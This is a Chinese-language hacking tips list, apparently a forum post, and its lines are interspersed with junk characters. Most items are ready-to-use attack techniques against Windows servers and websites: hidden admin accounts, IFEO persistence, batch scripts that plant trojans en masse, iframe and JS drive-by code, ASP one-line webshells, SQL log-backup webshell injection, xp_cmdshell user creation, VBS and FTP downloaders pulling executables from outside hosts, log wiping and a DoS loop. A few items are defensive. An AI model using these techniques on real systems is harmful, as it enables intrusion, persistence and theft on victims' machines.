Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
" F5 G4 S6 E! c& T; g3 @cacls C:\windows\system32 /G hqw20:R3 W: V2 B! w) \" \" m- O
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入, Q8 U" B1 Z# i! f
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
h* @1 ?2 W" @) L: Y
% y6 t" F5 |4 A2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。5 Q- x5 e0 O' K* O
( V9 X% V/ {3 M d+ }
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。* o3 r* H$ C$ M. I! m
+ d) t/ f7 S8 R( [; K# k* T4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号' Z. {( H7 o; q% U" [4 @! m" j
9 F0 h4 k/ `4 A' E7 I2 |) g
5、利用INF文件来修改注册表7 D6 G" ~2 n8 Z
[Version]
' K0 _! E4 r( o6 \3 T0 {( s$ SSignature="$CHICAGO$"7 h0 ?0 j$ e8 ?1 _* |" ?
[Defaultinstall]
. |8 z" H3 Z0 t: SaddREG=Ating# Z& o+ `4 ^! y1 i4 }7 l7 A
[Ating]
+ J3 G/ c6 }$ `) @HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
( J; a$ Y% g: n8 m) U' P以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
9 F% k% w5 }" { }( H, nrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
4 t. G6 N4 O# Y6 F% J5 U- u, ~' J其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
1 O$ g3 U5 c7 [9 KHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU6 V2 Y- J p' x! p2 g
HKEY_CURRENT_CONFIG 简写为 HKCC
' @2 f# L6 s* B8 ~7 {' u0 X8 P0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
0 D0 z" c( X$ R9 l# K9 R"1"这里代表是写入或删除注册表键值中的具体数据) \8 `0 k+ z$ ?+ i# K! W5 {
5 T' b6 v+ t o( `6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,; F' t) w0 M1 t' C( C
多了一步就是在防火墙里添加个端口,然后导出其键值- r3 U8 O; W. |
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
! B) O: G' p: {4 u+ R' E* U% R: p5 V" Q% H/ ?2 L; ~0 w
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽* _$ r1 i1 @+ D3 k4 `8 `
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
$ F0 g- C& ]+ L" c. B* k) w3 ^+ H* A3 k- M# R, L2 L
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
7 M8 D/ k/ j& S( ?& w, `
9 C6 |* r; a! V9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
1 z, Y5 G& y/ h. l5 Q) Q可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
' |* }- T" t' O% t+ V; E# V2 b1 t4 H
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”- s- J1 h# M, i4 b0 L" R- H
- Q( k# @" F) t9 w: U
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
) g( h$ ~; _) G$ [: D用法:xsniff –pass –hide –log pass.txt7 e' ]; S1 l/ a5 I$ \
* m- F7 G1 ~: `" z/ U
12、google搜索的艺术5 I9 @4 I5 b, X+ Q% q8 B* ^6 s
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
6 m5 |3 Z$ w3 ?' s \或“字符串的语法错误”可以找到很多sql注入漏洞。$ j$ n$ G K, y6 i
2 M* U! @2 V8 C$ q5 U* Q
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
9 Z$ u1 l. Z& H; e2 Y! k. u1 ]8 T' n! W2 k( G9 a4 L, k
14、cmd中输入 nc –vv –l –p 1987+ ~9 p0 P, |1 s; i8 Z
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
8 N% o. C! l6 T/ X! e% W2 m5 \+ ~' ]. l5 z7 s- i% Y8 m, A
15、制作T++木马,先写个ating.hta文件,内容为# _. C9 @* f# w0 u$ x
<script language="VBScript">7 S% g2 x- j8 ?+ ]3 B& l
set wshshell=createobject ("wscript.shell" )6 j, P& r* k; |, h( S" |
a=wshshell.run("你马的名称",1): i' ? f2 q& M$ c; M3 b
window.close4 s/ G# V$ b0 a9 u r0 ?1 j+ l$ c
</script>
K! j( `$ d" A* p* R- z: Q) \再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
) E1 O" r4 T4 m f$ I
& V% \; y) T7 \) f! p& P16、搜索栏里输入4 U) F% g+ h: c; a# e6 ?) z$ w
关键字%'and 1=1 and '%'='
7 w6 N& Z- V( k& {& B9 C8 D关键字%'and 1=2 and '%'='; `/ s" H- Q4 D- @. N; b
比较不同处 可以作为注入的特征字符. j% B5 Y4 j/ t0 l& [
" J% \+ H4 q5 `. W3 ]% g) \
17、挂马代码<html>2 c8 q" C: ]& D0 g9 ~/ V6 W* I
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
" h+ `7 f5 z: V5 j Y5 L</html>2 ^& w0 ?+ K% n9 |2 \% k
. L8 ~7 L/ L* C3 `; F18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,9 {- ^0 r+ k4 A2 d( g9 w8 _
net localgroup administrators还是可以看出Guest是管理员来。) ?2 h9 j n6 F, c# K) q V
$ \2 I( y6 ?" }19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
7 P. Y% |* W2 @+ H* X/ t用法: 安装: instsrv.exe 服务名称 路径- n g6 F9 [1 g. W
卸载: instsrv.exe 服务名称 REMOVE9 @4 n$ E" d/ v2 b* c! T
5 O7 ~+ }+ C, L+ @6 Q; P9 P, K
( [6 ?; g8 Z4 t- _21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉& u7 S; J3 u3 ~! @% o3 }: D
不能注入时要第一时间想到%5c暴库。* T9 ?* C3 W3 G0 U
9 x, x5 `$ a: [ e( i2 _3 q6 D22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~5 L; b# Z% l i
" G& M+ j2 I! y4 f R
23、缺少xp_cmdshell时
* y8 l2 w9 J. E3 Y- v$ d尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll': ]9 w, f% |6 J# j0 } L5 }7 _
假如恢复不成功,可以尝试直接加用户(针对开3389的)
, A) U3 H2 r1 [) L9 X7 S/ zdeclare @o int& d: ]2 R* P4 K5 Y
exec sp_oacreate 'wscript.shell',@o out( |( M/ H2 C4 R
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
9 c1 j2 }3 w5 d% ]4 y) }' r. ^4 f9 t0 l' s8 E7 B
24.批量种植木马.bat
8 x; ^0 Y# Q5 v4 k) ~for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
% l2 d! Q Z! ]" _( c$ Zfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
& [& L0 M8 X% B/ {) `扫描地址.txt里每个主机名一行 用\\开头" p7 ~: U3 B0 O& ^3 k; @/ E
* _7 M3 C2 M& |6 I+ a2 L5 }4 I
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
( E3 i$ v) o" m- z1 p% l. o ]" E1 a' L7 W! R# ?1 q: Y0 E
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
3 j3 h; s3 s0 Y1 S( K) l$ M. X将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下., h9 h% m9 m& L _* b2 g
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马8 u- L2 d6 G$ X0 F# M6 z
) T1 T" ]6 K w, [) b/ b. I/ Z1 _
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
' h. ?8 |( e, ]8 _# o9 Y4 ]7 [然后用#clear logg和#clear line vty *删除日志
, I$ {0 V; H/ d: r0 U' f; G$ a1 V
28、电脑坏了省去重新安装系统的方法0 W- Q) p' K+ f: f5 Y
纯dos下执行,6 {! i1 @) b& a. g( \
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config3 h! c3 o" A- N4 H4 Z* t
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
4 Z8 E" ~) ^% l5 _8 p1 \, G6 J
M, T4 K1 J; |. ^* l# b6 ^29、解决TCP/IP筛选 在注册表里有三处,分别是:
; m! l- G U- Y% x% zHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
1 y+ [. f* Y* _+ F2 g4 N9 sHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip6 r% b4 c. S) w
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
- o1 g" R. y* t" a+ }5 y- k分别用2 e% U4 G0 {% Y" H9 r2 i$ d7 T# J
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 {; R* Y+ @. K; o; ?$ }regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- }9 j @9 g: G7 r: uregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip* y5 t3 [+ N) ^: s4 r
命令来导出注册表项
) s+ N( l6 Q! N* \0 H然后把三个文件里的EnableSecurityFilters"=dword:00000001,
! b3 b7 L% s' d/ x: Y; B改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用% v) U& l* ~; S! F7 {
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
; k# [6 V$ A, D1 H
; n$ F s4 s. f) \30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
/ I# q; F) f' B; N5 g& OSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
- Z* p4 O1 ~$ `% G6 Z# L% Z% G$ T( s0 r/ t, D% d5 J4 a
31、全手工打造开3389工具
! D/ W. |/ Q# m/ J( W9 g* o. d$ n, L打开记事本,编辑内容如下:. K3 C- l/ O1 i- m: B% x
echo [Components] > c:\sql
( ]/ u8 ~" r& q5 \% mecho TSEnable = on >> c:\sql2 K5 y; W; t0 N) \
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q. F! [* p8 C; O- K& c9 [; C' \( h
编辑好后存为BAT文件,上传至肉鸡,执行
9 U& d' K$ n. T9 j5 t) g9 m2 l$ v& s9 v: K
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马. U$ V& c& t3 C- g5 l& j% R1 j* V
: A: l8 f3 [5 Y( j$ K33、让服务器重启
' L" t: Z v8 z2 z8 ^4 X写个bat死循环:9 a% l7 W, e9 v/ E: R0 d
@echo off) ^7 b: U& N- f2 V
:loop19 ?- Y$ |- F( u0 Q, f+ _" t
cls+ q$ c" t# \; h, ]* m
start cmd.exe6 E) ]4 F6 O% M5 ?0 ~1 \
goto loop1* q: n1 g( J4 P0 k) ]% O
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
/ }/ L5 g( _7 \/ e
. ]: P3 m( c% z a. z34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,' r. B( e0 G2 e- N7 S
@echo off, ^! k" @, `# I2 M' v, S
date /t >c:/3389.txt' |- Q% {$ Q3 {; D/ N
time /t >>c:/3389.txt/ C3 S" _: X; P8 @, t( K
attrib +s +h c:/3389.bat4 C* V# d1 W6 r
attrib +s +h c:/3389.txt/ ?1 Q) F5 E1 Q' Z
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt) E& E) D$ {, ~8 ^& L- N5 C e
并保存为3389.bat: L1 S z: O/ Z. W/ ?( |. i5 v
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号" j# M& h% F+ O
7 y s* m/ O$ x7 o1 ] p& R35、有时候提不了权限的话,试试这个命令,在命令行里输入:
: @$ g, M5 F. r H3 E; H! ^* _) xstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页); O: c. ~3 v# w# V6 O
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。( E+ ^% j X) v& L0 ?: } h
7 y' a4 c% @1 e
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件3 k* }* d% ]) R6 [ E9 I! X9 p
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
( e. T8 T" n3 ^6 V6 _& R: decho 你的FTP账号 >>c:\1.bat //输入账号* s! r- ^5 O& w' [: j
echo 你的FTP密码 >>c:\1.bat //输入密码0 ?+ g: Y5 d6 }& v9 y
echo bin >>c:\1.bat //登入+ j5 v; h( z0 Z% z
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么# M# W) }$ z$ I6 ]8 o% W4 Z" c9 R
echo bye >>c:\1.bat //退出# A7 E) q( u2 A8 V8 t. D; r$ W, v. q
然后执行ftp -s:c:\1.bat即可* K; N* |. R3 `$ d
) d% Z& A; z4 S4 A! @; T5 c" ^- `, A4 H
37、修改注册表开3389两法1 S8 N# m4 r3 M* a" z
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
4 f( q* c* p% q2 ?' N* recho Windows Registry Editor Version 5.00 >>3389.reg* w& D" S, Z/ C3 V
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg) ?. D, }/ d0 \- ?5 i1 p
echo "Enabled"="0" >>3389.reg
2 l4 x2 [- b9 B% cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
. q8 q, G6 {7 ]3 O$ nNT\CurrentVersion\Winlogon] >>3389.reg
I" K- z6 }, j$ h- X6 E! {echo "ShutdownWithoutLogon"="0" >>3389.reg" o9 p) {- R3 X6 x
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]$ b) f; h b$ `5 W
>>3389.reg
! m2 x: y4 Q$ _3 T$ `6 d/ recho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
7 G" C: I- }( j5 {( @* o% [8 e' xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
: q& ~1 E, g0 C( _' q>>3389.reg
x/ `' ]& f' P2 p2 j8 Kecho "TSEnabled"=dword:00000001 >>3389.reg
4 x$ K: Q- r' recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
, _2 E0 e0 q4 i: y3 E2 wecho "Start"=dword:00000002 >>3389.reg! v; X3 g3 j' T6 j! @4 q) \6 V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]0 h) D1 s5 H1 _( Q4 w( j7 j7 W
>>3389.reg
7 I2 x0 s9 i$ J0 H% ?" p6 Qecho "Start"=dword:00000002 >>3389.reg
7 n0 K; i5 ^; }/ ?" b2 {echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
_1 t/ i8 }- eecho "Hotkey"="1" >>3389.reg
% N% U7 | G. Y2 B' b1 d- Y, L. Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: f8 e0 S3 J8 p- V5 UServer\Wds\rdpwd\Tds\tcp] >>3389.reg' o: @+ `- E) k
echo "PortNumber"=dword:00000D3D >>3389.reg
4 K. u; R* I- N4 z7 s' j, V& Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; L/ i! u2 R, a/ p1 nServer\WinStations\RDP-Tcp] >>3389.reg
4 M/ h! D8 p+ L) V0 {4 D/ d- Eecho "PortNumber"=dword:00000D3D >>3389.reg- v5 }* u& J, u
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
- F& J- Q$ `6 u5 D(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)' x0 v) ^! @! B" H
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效7 V. Q: `3 _; `9 u
(2)winxp和win2003终端开启
. ~# K6 E9 ^% s$ ^; m用以下ECHO代码写一个REG文件:/ m1 S& i; N4 T0 e7 q9 L3 C
echo Windows Registry Editor Version 5.00>>3389.reg1 Y0 I% f4 g0 O# S8 h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' J) J1 N5 T2 E; g) B# xServer]>>3389.reg
8 U# R5 J2 i S# Z9 Cecho "fDenyTSConnections"=dword:00000000>>3389.reg
8 k8 S( F7 P$ hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! m9 h1 f% d8 R& C$ C8 ^Server\Wds\rdpwd\Tds\tcp]>>3389.reg$ w! E2 B* g/ ?3 a% J" L. k/ j
echo "PortNumber"=dword:00000d3d>>3389.reg& `2 O8 K$ ^( q# N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) `2 W' v& `% Q7 Q" H, `7 j8 D
Server\WinStations\RDP-Tcp]>>3389.reg
6 |$ m0 y2 _9 K _# @echo "PortNumber"=dword:00000d3d>>3389.reg
! J* i2 [; [# F; X5 Q然后regedit /s 3389.reg del 3389.reg
5 d. O3 D% Q, q; l# b2 j+ AXP下不论开终端还是改终端端口都不需重启0 v# A2 }0 k! H* z( \, `
, l2 Y, Q$ |" c% Q F- u2 E
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃0 P: C3 u' J0 ^" b$ k* }
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'% Z1 x7 ]. [0 E; H3 i
/ n1 G0 M- C- {* W
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
8 f8 f- R/ U7 C$ N/ l3 l6 Z(1)数据库文件名应复杂并要有特殊字符" p4 {8 U/ O ]6 N3 q2 t' x }
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
7 Z+ M- Y" d8 U$ {9 t5 F将conn.asp文档中的
1 n0 J2 ~ g4 F& y6 JDBPath = Server.MapPath("数据库.mdb")
8 d& [! \6 q: x* E" cconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
/ o& y$ |5 t, _* ? K& a. X5 _8 h
) K. y/ V( C6 }6 u# \6 d, d修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
8 d/ i5 F9 ? T8 ~1 I1 ]* R(3)不放在WEB目录里5 m+ N& z9 M7 a" }% d
# ~: ]: ?' k! R5 S9 b2 W' N9 @. [40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉. D2 K8 m, i' Y" W
可以写两个bat文件; H% Q5 D. J: V
@echo off) Q& w( [! {' V j% Z
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe4 ]: @. \8 O& ?6 G: r
@del c:\winnt\system32\query.exe
* Q& D! }* F9 C" I. i' U8 u@del %SYSTEMROOT%\system32\dllcache\query.exe4 |8 F) { t e" |9 c2 H
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
6 r; \$ r+ s7 q1 K6 g1 F- L7 w. ^% B0 k& i [
@echo off; ]# Q2 N. j+ Z; E- H
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe% g s8 m" g# @* T+ O8 x
@del c:\winnt\system32\tsadmin.exe7 o% f& x7 \- d( X, M
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
" g7 m, \' q3 w# O5 o' E0 v& I& ^, c9 |5 m4 w' }5 d: T3 d, L
41、映射对方盘符
; C5 ?2 |# B$ W6 itelnet到他的机器上,3 L; I9 M9 A; ?' x
net share 查看有没有默认共享 如果没有,那么就接着运行
" Q7 ]- k" o$ Z) q6 T& [- Z0 [net share c$=c:$ l U+ h7 a7 I! W
net share现在有c$! P8 ~0 G9 L5 s, h4 x: B0 T( p
在自己的机器上运行
1 k( p4 A V r5 H* {& \net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K, |# e$ ~- \! s5 H6 e
% |0 E) j0 @( k) C, Y! r/ X
42、一些很有用的老知识
3 y8 l1 Y0 V$ G; ?7 Ttype c:\boot.ini ( 查看系统版本 )" |& y& f) j; B- \. j9 Q! O+ D3 ~1 O
net start (查看已经启动的服务)
8 m) S" p2 G' t2 m1 `: k9 [query user ( 查看当前终端连接 )5 N* s; i; r$ e ?9 K& n
net user ( 查看当前用户 )
' K. I. ^# C! anet user 用户 密码/add ( 建立账号 )) P- B9 y& V% E7 k
net localgroup administrators 用户 /add (提升某用户为管理员)( B. w! ]! H. P8 y
ipconfig -all ( 查看IP什么的 )
* a& K/ _+ N; u0 U$ H/ Y7 \. v, J5 hnetstat -an ( 查看当前网络状态 ). R5 @( `8 `+ C( D
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
6 \, V" h/ u% c+ {2 @2 B$ G3 Q克隆时Administrator对应1F4
6 b5 T9 Z6 @ k- P0 Sguest对应1F5& t# ?! S( z4 ~7 ]" E9 {- _
tsinternetuser对应3E8
6 I' m# B' {. n# P+ [& p6 f( w; U6 r4 q+ i- c
43、如果对方没开3389,但是装了Remote Administrator Service1 ?6 z8 U- \& M& i0 c/ T3 G D8 ^
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
# z; C, n+ e6 R4 Y* k0 @解释:用serv-u漏洞导入自己配制好的radmin的注册表信息+ B) d) _7 d- J* y/ i' ]
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
# x: D D. @1 I' p- R+ V$ q2 t$ b1 W C5 D
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
+ ~, t; O, y+ \; b) }# J, A本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
* C) ^- D W$ _9 e; S. H7 ^" S" f; X
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
_. b8 a& Y7 ^5 n% N* V6 }echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
- X' `# Y9 Q8 M q! r m^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =1 @" A7 `, _% Q; V# L
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =7 L0 H( i F. Q, f2 W
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
. C0 O" U0 ^% d. t8 z(这是完整的一句话,其中没有换行符)+ U% I5 X1 a! H
然后下载:. q* M0 B7 p! U& V2 P) T
cscript down.vbs http://www.hack520.org/hack.exe hack.exe8 q# [% p$ D+ V; b
2 l- D# U! v: _
46、一句话木马成功依赖于两个条件:
, c: T6 K9 V1 {. O' B4 g0 ^/ E1、服务端没有禁止adodb.Stream或FSO组件
- p+ F) F; c- k( u2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
2 e. i% {8 Y V5 z; s
2 @3 _1 B0 d1 `. W2 m4 D47、利用DB_OWNER权限进行手工备份一句话木马的代码:2 x* i4 O$ J1 y0 J% J! g) w
;alter database utsz set RECOVERY FULL--' r a6 \( p- [* q/ Z$ h1 f( c
;create table cmd (a image)--/ b: f! o; b2 ]
;backup log utsz to disk = 'D:\cmd' with init--
% h) g' Y7 S: O# i, H9 q;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
( B% a7 h `& z+ M4 S: F;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'-- B( f# k7 Z( n+ C
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。: c$ {$ c p2 f6 `8 K
1 a# Y2 o% F0 m+ t9 n5 h6 u2 i48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:4 z- X. ^" g. C
+ X7 e* }+ M1 y L' q用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options/ Q* Y% i" H* P' e* F5 M) \
所有会话用 'all'。
& _! T! Y) V* ?) _-s sessionid 列出会话的信息。8 F) L+ P: V0 h2 o+ q9 \' x
-k sessionid 终止会话。. S7 U+ I( o8 A! a. b; I
-m sessionid 发送消息到会话。! y# W/ z& a8 e4 x2 r
3 k3 f6 r/ x5 z$ M# a; Z/ q% Q; T
config 配置 telnet 服务器参数。
. U) U! T2 Z a6 D2 f1 l8 u" o
' w1 d0 Z; {" l0 Z; n, Ecommon_options 为:$ F# `" H# s, `
-u user 指定要使用其凭据的用户8 Q6 ?/ K- k0 F
-p password 用户密码( r" }" _9 u r; [) E
! a6 w+ d5 D3 R6 X% A
config_options 为:
/ c0 u2 d) W; R" Q+ k% Fdom = domain 设定用户的默认域; q; @2 U9 ?2 j
ctrlakeymap = yes|no 设定 ALT 键的映射
) p( m! m; R( H+ q6 B9 Otimeout = hh:mm:ss 设定空闲会话超时值
& m1 u* `- a# p4 Xtimeoutactive = yes|no 启用空闲会话。
; w: o: R+ w/ ]: Y5 t" a9 Smaxfail = attempts 设定断开前失败的登录企图数。# v3 b% C1 E1 O
maxconn = connections 设定最大连接数。
& ^# l9 a- @: Eport = number 设定 telnet 端口。
! w3 P4 d6 b1 C3 Bsec = [+/-]NTLM [+/-]passwd
, I: W6 q4 e/ P6 `, n9 g' W设定身份验证机构
" J% W# f% d, x) B( [ }fname = file 指定审计文件名。
3 Y: _. }4 S- X% Bfsize = size 指定审计文件的最大尺寸(MB)。
! ]1 D8 h1 k! z) T0 B5 Cmode = console|stream 指定操作模式。- p$ j' x4 i3 C5 \9 h$ E! z. n" s+ _! K1 b
auditlocation = eventlog|file|both
3 i3 y3 a2 h, V) i+ N, l5 W指定记录地点
2 q% A4 S4 x* r- s7 zaudit = [+/-]user [+/-]fail [+/-]admin
: [ c( h% i4 ^, R; N% r) E0 B6 K+ A. t8 K, e
49、例如:在IE上访问:( ^5 I1 Z" R) l! E, T" T! \
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/" {0 R! ^# r7 v( j
hack.txt里面的代码是:' V& B, D, b* @4 E
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">* O2 h% X3 ^% }- O) `7 W# P9 H9 p
把这个hack.txt发到你空间就可以了!
- J3 o, b2 b# y# O% F( w# @4 A这个可以利用来做网马哦!
% ?5 }) A5 A6 `# ]8 h: ]6 w. O" @/ s6 s5 y! Y7 V4 I: v
50、autorun的病毒可以通过手动限制!
- ]4 K5 M& b5 `9 s* d1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!& n8 j$ ]4 h9 u6 q. J) m" {
2,打开盘符用右键打开!切忌双击盘符~
& T1 x2 m! d- ~! J0 A0 r3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
$ N* c( Q( h' \5 j: [+ D8 o4 C; k6 J$ f- v. L
51、log备份时的一句话木马:+ j% {) H8 V j" t6 d
a).<%%25Execute(request("go"))%%25>8 I2 i1 g5 d3 f
b).<%Execute(request("go"))%>
. g5 b6 Q4 {# v8 X/ ]c).%><%execute request("go")%><%. P" W9 a3 c0 Y- E" u1 a( x( B
d).<script language=VBScript runat=server>execute request("sb")</Script>
* v& R. E" N1 |e).<%25Execute(request("l"))%25>* C$ C1 y7 q9 Y/ B" p
f).<%if request("cmd")<>"" then execute request("pass")%>
7 p# S t1 g' k- i* y. W# E- q1 r
% U3 R8 H; J$ S52、at "12:17" /interactive cmd( P! }2 n2 r7 u, h! ]5 u+ C- I D
执行后可以用AT命令查看新加的任务
